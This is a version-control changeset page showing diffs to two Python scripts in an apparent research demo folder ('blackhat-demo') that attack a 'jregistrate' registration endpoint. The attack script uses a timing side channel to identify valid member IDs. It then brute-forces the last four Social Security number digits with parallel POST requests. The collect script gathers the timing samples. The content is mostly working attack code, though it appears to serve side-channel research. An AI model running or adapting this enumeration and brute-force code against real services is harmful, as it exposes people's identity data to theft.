Changeset 18


Ignore:
Timestamp:
08/01/15 19:04:49 (9 years ago)
Author:
tim
Message:

.

Files:
2 added
2 edited

Legend:

Unmodified
Added
Removed
  • test/blackhat-demo/jregistrate-attack

    r15 r18  
    4343parser.add_argument('port', nargs='?', type=int, default=8080,
    4444                    help='TCP port number of HTTP service (default: 8080)')
     45parser.add_argument('guess', nargs='?', type=str, default=None,
     46                    help='Retry a member_id guess')
    4547options = parser.parse_args()
    4648
     
    7577            session = requests.Session()
    7678            response = session.send(req, verify=False)
    77             #print(repr(response.raw._original_response.local_address))
    7879            reported = extractReportedRuntime(response.headers, response.text)
    7980            retry = False
     
    8283            time.sleep(1.0)
    8384            sys.stderr.write("ERROR: retrying...\n")
    84         #print(data.encode('utf-8'), reported)
    8585       
    8686    return {'userspace_rtt':response.elapsed.microseconds*1000,
     
    103103
    104104
     105def guessSSN(member_id, last_four):
     106    method = 'POST'
     107    path = '/jregistrate/register'
     108    url = "%s://%s:%d%s" % (protocol,hostname,port,path)
     109    headers = {"Content-Type":"application/x-www-form-urlencoded"}
     110    body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321')
     111    req = requests.Request(method, url, headers=headers, data=body).prepare()
     112    session = requests.Session()
     113    response = session.send(req, verify=False)
     114
     115    if 'Bad password' in response.text:
     116        return True
     117    else:
     118        return False
     119   
     120
     121def bruteSSN(member_id):
     122    from nanownlib.parallel import WorkerThreads
     123    wt = WorkerThreads(4, guessSSN)
     124   
     125    for last_four in range(9999):
     126        ssn = "%4d" % last_four
     127        wt.addJob(ssn, (member_id,ssn))
     128
     129    for i in range(9999):
     130        ssn,success = wt.resultq.get()
     131        if success:
     132            wt.stop()
     133            return ssn
     134
     135    wt.stop()
     136    return None
     137
     138
    105139setCPUAffinity()
    106140setTCPTimestamps()
     
    109143
    110144cases = {"invalid":"0012-9999"}
    111 guesses = [("0012-%d"%id) for id in range(0,9999) if id != 2019]
     145guesses = [("0012-%04d"%id) for id in range(0,9999) if id != 2019]
    112146random.shuffle(guesses)
    113 num_observations = 100
     147num_observations = 250
    114148trim = (0,0)
    115 classifier = "septasummary"
    116 params = {"distance": 25, "threshold": 40094.274}
     149classifier = "quadsummary"
     150params = {"distance": 5, "threshold": 18761.53575}
    117151classifierTest = functools.partial(classifiers[classifier]['test'], params, True)
    118152
     153if options.guess != None:
     154    guesses = [options.guess]
    119155
    120156sid = findMaxSampleID(db) + 1
    121157for guess in guesses:
    122158    print("Collecting samples for:", guess)
     159    start = time.time()
    123160    cases["valid"] = guess
    124     stype = "attack_%s" % guess
     161    stype = "attack_%s_%d" % (guess, int(time.time()*1000))
    125162    sample_order = list(cases.items())
    126163
     
    147184    sniffer_fp.close()
    148185    num_probes = analyzeProbes(db, trim=trim)
    149     print("num_probes: ", num_probes)
    150186
    151187    if classifierTest(db.subseries(stype, "valid")):
    152         print("Found valid member_id: ", guess)
    153         break
    154 
    155 
    156 def guessSSN(member_id, last_four):
    157     method = 'POST'
    158     path = '/jregistrate/register'
    159     url = "%s://%s:%d%s" % (protocol,hostname,port,path)
    160     headers = {"Content-Type":"application/x-www-form-urlencoded"}
    161     body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321')
    162     req = requests.Request(method, url, headers=headers, data=body).prepare()
    163     session = requests.Session()
    164     response = session.send(req, verify=False)
    165 
    166     if 'Bad password' in response.text:
    167         return True
     188        print("  Looks valid...")
     189        ssn = bruteSSN(guess)
     190        if ssn == None:
     191            print("  Hmm, didn't find an SSN... ")
     192        else:
     193            print("  W00t! Found SSN: %s" % ssn)
    168194    else:
    169         return False
    170 
    171    
    172 print(guessSSN('0012-5969', '4298'))
    173 sys.exit(0)
    174 
    175 for last_four in range(9999):
    176     if guessSSN(guess, "%4d" % last_four):
    177         print("Found valid SSN last four digits:", last_four)
    178         break
     195        print("  Looks invalid")
     196    print("  Runtime: ", time.time()-start)
  • test/blackhat-demo/jregistrate-collect

    r15 r18  
    3434parser = argparse.ArgumentParser(
    3535    description="")
    36 parser.add_argument('-c', dest='cases', type=str, default='{"valid":"0012-5969","invalid":"0012-9999"}',
    37                     help='JSON representation of echo timing cases.')
    38 parser.add_argument('--no-tcpts', action='store_true', help='Disbale TCP timestamp profiling')
     36parser.add_argument('--no-tcpts', action='store_true', help='Disable TCP timestamp profiling')
    3937parser.add_argument('--no-control', action='store_true', help='Do not collect separate control data.  Instead, synthesize it from test and train data.')
    4038parser.add_argument('session_name', default=None,
     
    5553protocol = 'http'
    5654
    57 cases = json.loads(options.cases)
     55cases = {"valid":"0012-8846","invalid":"0012-9999"}
    5856
    5957
     
    6967
    7068
    71 def sendRequest(data=None):
     69def sendRequest(case_data):
    7270    method = 'POST'
    7371    path = '/jregistrate/register'
    7472    url = "%s://%s:%d%s" % (protocol,hostname,port,path)
    7573    headers = {"Content-Type":"application/x-www-form-urlencoded"}
    76     body = (b'member_id='+data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=')
     74    body = (b'member_id='+case_data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=')
    7775    req = requests.Request(method, url, headers=headers, data=body).prepare()
    7876
     
    8280            session = requests.Session()
    8381            response = session.send(req, verify=False)
    84             #print(repr(response.raw._original_response.local_address))
    8582            reported = extractReportedRuntime(response.headers, response.text)
    8683            retry = False
     
    8986            time.sleep(1.0)
    9087            sys.stderr.write("ERROR: retrying...\n")
    91         #print(data.encode('utf-8'), reported)
    9288       
    9389    return {'userspace_rtt':response.elapsed.microseconds*1000,
     
    170166                sample_order[i] = (sample_order[i][0],sample_order[0][1])
    171167            random.shuffle(sample_order)
    172             #print('after', sample_order)
    173168           
    174169        results = []
     
    179174                                 sample_order[i][1]))
    180175
    181         #print(results)
    182176        db.addProbes(results)
    183177        db.conn.commit()
     
    185179
    186180        if (time.time() > next_report):
    187             #s = time.time()
    188181            reportProgress(db, sample_types, start)
    189             #print("reportProgress time:", time.time()-s)
    190182            next_report += report_interval
    191183
     
    194186stopSniffer(sniffer)
    195187
    196 start = time.time()
    197188associatePackets(sniffer_fp, db)
    198189sniffer_fp.close()
    199 end = time.time()
    200 print("associate time:", end-start)
    201190
    202191if options.no_control:
Note: See TracChangeset for help on using the changeset viewer.